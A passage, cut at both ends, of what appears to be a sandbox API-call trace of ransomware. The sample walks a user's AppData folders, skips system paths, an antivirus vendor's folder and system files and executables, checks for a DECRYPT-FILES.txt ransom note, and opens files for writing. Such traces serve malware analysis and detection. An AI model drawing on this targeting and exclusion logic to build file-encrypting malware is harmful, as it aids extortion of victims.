ftLastAccessTime.dwLowDateTime=0xaaba2ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaba2ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pbk", cAlternateFileName="")) returned 1 [0180.639] lstrcmpW (lpString1="Pbk", lpString2=".") returned 1 [0180.639] lstrcmpW (lpString1="Pbk", lpString2="..") returned 1 [0180.639] lstrcatW (in: lpString1="Pbk", lpString2="\\" | out: lpString1="Pbk\\") returned="Pbk\\" [0180.639] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\", lpString2="Pbk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\" [0180.639] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="\\Program Files") returned 0x0 [0180.639] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch=":\\Windows") returned 0x0 [0180.639] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="\\Games\\") returned 0x0 [0180.639] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.639] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.639] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.639] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.639] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.639] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="\\All Users") returned 0x0 [0180.639] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.639] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.639] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.640] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="AhnLab") returned 0x0 [0180.640] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.640] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\") returned 80 [0180.640] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.640] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\\\0a16c9.tmp") returned 91 [0180.640] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x27c [0180.642] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\") returned 80 [0180.642] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.642] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\\\DECRYPT-FILES.txt") returned 98 [0180.642] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.642] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\") returned 80 [0180.642] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*" [0180.642] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeeca3d60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeca3d60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0180.643] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.643] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeeca3d60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeca3d60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.643] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.643] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.643] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeeca3d60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeeca3d60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeeca3d60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.643] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.643] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.643] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.643] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.643] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.643] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.643] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.643] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.643] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.643] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.643] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.643] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.643] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.643] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.643] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.643] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\") returned 80 [0180.643] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.643] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\" [0180.643] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\0a16c9.tmp" [0180.643] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.644] CloseHandle (hObject=0x0) returned 0 [0180.644] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.644] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaba2ae0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaba2ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaba2ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.644] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.644] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xaaba2ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaba2ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_hiddenPbk", cAlternateFileName="_HIDDE~1")) returned 1 [0180.644] lstrcmpW (lpString1="_hiddenPbk", lpString2=".") returned 1 [0180.644] lstrcmpW (lpString1="_hiddenPbk", lpString2="..") returned 1 [0180.644] lstrcatW (in: lpString1="_hiddenPbk", lpString2="\\" | out: lpString1="_hiddenPbk\\") returned="_hiddenPbk\\" [0180.644] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\", lpString2="_hiddenPbk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\" [0180.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="\\Program Files") returned 0x0 [0180.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch=":\\Windows") returned 0x0 [0180.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="\\Games\\") returned 0x0 [0180.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="\\All Users") returned 0x0 [0180.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.644] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.645] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="AhnLab") returned 0x0 [0180.645] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.645] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned 91 [0180.645] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.645] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\\\0a16c9.tmp") returned 102 [0180.645] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x284 [0180.645] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned 91 [0180.645] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.645] wsprintfW (in: param_1=0x36fde00, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\\\DECRYPT-FILES.txt") returned 109 [0180.645] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.646] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned 91 [0180.646] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*" [0180.646] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeecc9ec0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeecc9ec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799f8 [0180.646] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.646] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xeecc9ec0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeecc9ec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.646] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.646] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.646] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeecc9ec0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeecc9ec0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeecc9ec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.646] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.646] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.646] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.646] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.646] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.646] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.646] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.646] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.646] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.646] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.646] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.647] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.647] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.647] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.647] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.647] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned 91 [0180.647] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.647] lstrcpyW (in: lpString1=0x36fddf0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\" [0180.647] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\0a16c9.tmp" [0180.647] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.647] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\network\\connections\\pbk\\_hiddenpbk\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.647] CloseHandle (hObject=0x0) returned 0 [0180.647] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.647] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaba2ae0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaba2ae0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaba2ae0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.647] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.647] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x31a325d0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x31a325d0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x31a325d0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="rasphone.pbk", cAlternateFileName="")) returned 1 [0180.647] lstrcmpiW (lpString1="rasphone.pbk", lpString2="DECRYPT-FILES.txt") returned 1 [0180.647] lstrcmpiW (lpString1="rasphone.pbk", lpString2="autorun.inf") returned 1 [0180.647] lstrcmpiW (lpString1="rasphone.pbk", lpString2="boot.ini") returned 1 [0180.647] lstrcmpiW (lpString1="rasphone.pbk", lpString2="desktop.ini") returned 1 [0180.648] lstrcmpiW (lpString1="rasphone.pbk", lpString2="ntuser.dat") returned 1 [0180.648] lstrcmpiW (lpString1="rasphone.pbk", lpString2="iconcache.db") returned 1 [0180.648] lstrcmpiW (lpString1="rasphone.pbk", lpString2="bootsect.bak") returned 1 [0180.648] lstrcmpiW (lpString1="rasphone.pbk", lpString2="ntuser.dat.log") returned 1 [0180.648] lstrcmpiW (lpString1="rasphone.pbk", lpString2="thumbs.db") returned -1 [0180.648] lstrcmpiW (lpString1="rasphone.pbk", lpString2="Bootfont.bin") returned 1 [0180.648] lstrlenW (lpString="rasphone.pbk") returned 12 [0180.648] lstrcmpiW (lpString1="pbk", lpString2="lnk") returned 1 [0180.648] lstrcmpiW (lpString1="pbk", lpString2="exe") returned 1 [0180.648] lstrcmpiW (lpString1="pbk", lpString2="sys") returned -1 [0180.648] lstrcmpiW (lpString1="pbk", lpString2="dll") returned 1 [0180.648] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned 91 [0180.648] lstrlenW (lpString="rasphone.pbk") returned 12 [0180.648] lstrcpyW (in: lpString1=0x36fddf0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\" [0180.648] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\", lpString2="rasphone.pbk" | out: lpString1="C:\\Users\\5p5NrGJn0jS 